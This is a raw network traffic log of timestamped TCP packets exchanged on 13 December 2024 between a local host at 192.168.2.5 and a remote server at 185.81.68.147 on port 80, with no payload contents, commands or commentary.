Dec 13, 2024 01:37:07.623594046 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.623645067 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.624407053 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.624506950 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.624604940 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.625304937 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.625408888 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.625459909 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.626221895 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.626329899 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.626378059 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.627140045 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.627249002 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.627294064 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.628070116 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.628185987 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.628237963 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.629046917 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.629142046 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.629230022 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.629862070 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.629955053 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.630002022 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.630759954 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.630891085 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.630940914 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.631694078 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.631803989 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.631846905 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.632572889 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.632709980 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.632819891 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.633490086 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.633606911 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.633693933 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.634458065 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.634555101 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.634597063 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.635356903 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.635464907 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.635513067 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.636255026 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.636396885 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.636488914 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.637149096 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.637290955 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.637337923 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.638051033 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.638134956 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.638180971 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.638974905 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.639065981 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.639117002 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.639851093 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.639965057 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.640012980 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.640769005 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.640891075 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.640989065 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.641669989 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.641783953 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.641829967 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.642597914 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.642712116 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.642759085 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.643507004 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.643595934 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.643642902 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.644412041 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.644571066 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.644670010 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.645324945 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.645431042 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.645479918 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.646235943 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.646316051 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.646361113 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.647169113 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.647265911 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.647317886 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.648051977 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.648178101 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.648228884 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.648972034 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.649110079 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.649200916 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.649883986 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.650022984 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.650110006 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.650831938 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.650981903 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.651029110 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.651684999 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.651797056 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.651840925 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.652618885 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.652798891 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.652884960 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.653517962 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.653573036 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.653616905 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.654453039 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.654633999 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.654694080 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.655344963 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.655456066 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.655502081 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.656234980 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.656290054 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.656379938 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.657166958 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.657303095 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.657357931 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.658073902 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.658168077 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.658216000 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.658965111 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.659173965 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.659231901 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.659867048 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.660008907 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.660104036 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.660799026 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.660912991 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.661003113 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.661674976 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.708295107 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.805859089 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.805903912 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.806040049 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.806145906 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.806271076 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.806353092 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.807080030 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.807178020 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.807262897 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.807986975 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.808026075 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.808111906 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.808903933 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.809011936 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.809104919 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.809802055 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.809971094 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.810059071 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.810729027 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.810800076 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.810942888 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.811640978 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.811784029 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.811877012 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.812563896 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.812602043 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.812705994 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.813441038 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.813545942 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.813637972 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.814364910 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.814440012 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.814533949 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.815332890 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.815373898 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.815462112 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.816175938 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.816282988 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.816370964 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.817097902 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.817164898 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.817251921 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.817980051 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.818128109 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.818176031 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.818950891 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.818983078 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.819082975 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.819797993 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.819883108 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.819974899 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.820754051 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.820873022 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.820916891 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.821610928 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.821729898 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.821769953 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.822532892 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.822628975 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.822669983 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.823436022 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.823635101 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.823678017 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.824350119 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.824464083 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.824506998 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.825254917 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.825314045 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.825359106 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.826200962 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.826282978 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.826401949 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.827095985 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.827199936 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.827285051 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.827955961 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.828052998 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.828093052 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.828902960 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.829001904 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.829046011 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.829852104 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.829915047 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.829957008 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.830753088 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.830935955 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.831104994 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.831650019 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.831706047 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.831790924 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.832602978 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.832679033 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.832784891 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.833481073 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.833550930 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.833637953 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.834373951 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.834477901 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.834577084 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.835282087 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.835385084 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.835429907 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.836178064 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.836281061 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.836389065 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.837105989 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.837188005 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.837275028 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.837987900 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.838082075 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.838166952 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.838920116 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.839114904 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.839200974 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.839793921 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.839910030 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.839997053 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.840723038 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.840843916 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.840930939 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.841631889 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.841815948 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.841902971 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.842535019 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.842592955 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.842684031 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.843461990 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.843556881 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.843640089 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.844351053 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.844454050 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.844537020 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.845297098 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.845379114 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.845467091 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.846182108 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.846292019 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.846375942 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.847125053 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.847196102 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.847279072 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.848011971 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.848093033 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.848181963 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.848902941 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.849016905 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.849119902 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.849818945 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.849936962 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.850023031 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.850723982 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.850836039 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.850914955 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.851686954 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.851818085 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.851931095 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.852540016 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.852652073 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.852745056 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.853399038 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.895307064 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.997838020 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.997921944 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.998143911 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.998213053 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.998346090 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.998354912 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.998550892 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.999105930 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.999212980 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.999345064 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.000010014 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.000211000 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.000368118 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.000910997 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.001054049 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.001188040 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.001821995 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.001961946 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.002090931 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.002775908 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.002871037 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.002999067 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.003631115 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.003767967 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.003895044 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.004548073 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.004674911 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.004800081 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.005465984 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.005585909 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.005728960 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.006398916 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.006568909 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.006706953 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.007257938 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.007397890 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.007524014 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.008189917 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.008359909 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.008496046 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.009076118 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.009208918 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.009336948 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.009987116 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.010076046 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.010204077 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.010899067 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.011081934 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.011209011 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.011807919 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.011914968 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.012041092 CET	49707	80	192.168.2.5	185.81.68.147
